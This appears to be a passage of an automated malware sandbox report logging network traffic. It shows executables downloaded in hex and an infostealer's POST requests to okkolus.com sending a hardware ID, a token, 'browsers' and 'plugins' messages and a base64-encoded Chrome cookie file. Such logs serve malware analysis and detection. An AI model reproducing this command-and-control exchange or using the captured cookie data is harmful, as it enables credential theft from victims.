00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:56 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "6dde8-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 450024Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:52:59 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "1f3950-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 2046288Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:34 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "3ef50-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 257872Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 06 May 2024 00:53:36 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:49:08 GMTETag: "13bf0-5e7ef2e90e100"Accept-Ranges: bytesContent-Length: 80880Connection: closeContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGHJDBFIJKECAECAFHost: okkolus.comContent-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 38 34 39 30 35 36 38 30 36 31 32 37 38 39 35 37 33 32 30 39 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 75 6e 69 6b 0d 0a 2d 2d 2d 2d 2d 2d 45 48 4a 44 47 48 4a 44 42 46 49 4a 4b 45 43 41 45 43 41 46 2d 2d 0d 0a Data Ascii: ------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="hwid"A884905680612789573209------EHJDGHJDBFIJKECAECAFContent-Disposition: form-data; name="build"unik------EHJDGHJDBFIJKECAECAF--
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJJKEBGHJKFIDGCAAFCAHost: okkolus.comContent-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4a 4b 45 42 47 48 4a 4b 46 49 44 47 43 41 41 46 43 41 2d 2d 0d 0a Data Ascii: ------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------KJJKEBGHJKFIDGCAAFCAContent-Disposition: form-data; name="message"browsers------KJJKEBGHJKFIDGCAAFCA--
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBGIEGCFHCFHIDHIJECHost: okkolus.comContent-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 2d 2d 0d 0a Data Ascii: ------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------AEBGIEGCFHCFHIDHIJECContent-Disposition: form-data; name="message"plugins------AEBGIEGCFHCFHIDHIJEC--
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCBGCGHDGIEGCBFIEGCBHost: okkolus.comContent-Length: 6247Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /dfaf16606234b71d/sqlite3.dll HTTP/1.1Host: okkolus.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAAFCAFCBKFHJJJKKFHHost: okkolus.comContent-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 77 4f 44 41 79 43 55 35 4a 52 41 6b 31 4d 54 45 39 56 55 4a 6c 54 6b 4e 72 57 6a 4e 4d 4f 48 6c 59 59 33 67 34 63 57 67 30 53 6b 5a 56 57 47 74 33 61 30 35 44 4f 55 6c 79 5a 47 6c 53 5a 47 4a 71 55 31 52 71 63 56 4e 70 52 6d 67 34 56 33 4a 53 59 32 4a 4c 63 6c 39 79 54 30 70 69 5a 30 68 5a 4e 6c 52 42 4e 46 4a 55 4c 54 5a 77 63 7a 42 69 61 47 56 74 5a 6e 64 44 55 45 4a 7a 54 45 31 6e 55 46 51 33 4c 57 64 55 59 31 64 78 53 48 5a 61 64 6c 70 69 59 57 5a 50 63 47 74 78 55 6e 6b 77 5a 45 78 35 57 55 63 35 51 57 70 51 4d 6e 5a 69 56 55 4a 76 62 57 46 79 62 6d 4d 35 63 47 4e 61 56 6d 78 6f 53 47 74 56 5a 56 56 68 56 30 31 31 63 6b 51 77 52 30 64 59 65 56 63 77 4e 56 39 43 58 7a 46 4a 65 56 56 4f 57 55 56 46 54 47 31 35 63 56 4a 6e 43 69 35 6e 62 32 39 6e 62 47 55 75 59 32 39 74 43 56 52 53 56 55 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 6a 6b 35 4d 44 63 78 4e 6a 51 77 43 54 46 51 58 30 70 42 55 67 6b 79 4d 44 49 7a 4c 54 45 77 4c 54 41 31 4c 54 41 32 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 41 46 43 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 2d 2d 0d 0a Data Ascii: ------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------EBAAFCAFCBKFHJJJKKFHContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3
Source: global traffic	HTTP traffic detected: POST /cf5cbdf706840b3f.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDGHCBGDHJJKECAECBAHost: okkolus.comContent-Length: 359Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 62 66 33 38 61 61 34 37 35 37 33 37 37 64 34 31 63 62 34 62 37 61 62 37 39 62 65 39 31 32 38 66 33 33 30 30 65 38 63 36 63 33 63 31 30 63 38 39 34 65 61 66 32 61 39 64 31 64 32 37 35 61 34 30 65 34 34 33 66 61 35 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 57 6c 74 5a 57 68 79 64 6e 70 76 5a 43 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 47 44 47 48 43 42 47 44 48 4a 4a 4b 45 43 41 45 43 42 41 2d 2d 0d 0a Data Ascii: ------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="token"9bf38aa4757377d41cb4b7ab79be9128f3300e8c6c3c10c894eaf2a9d1d275a40e443fa5------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file_name"ZWltZWhydnpvZC5maWxl------CGDGHCBGDHJJKECAECBAContent-Disposition: form-data; name="file"------CGDGHCBGDHJJKECAECBA--
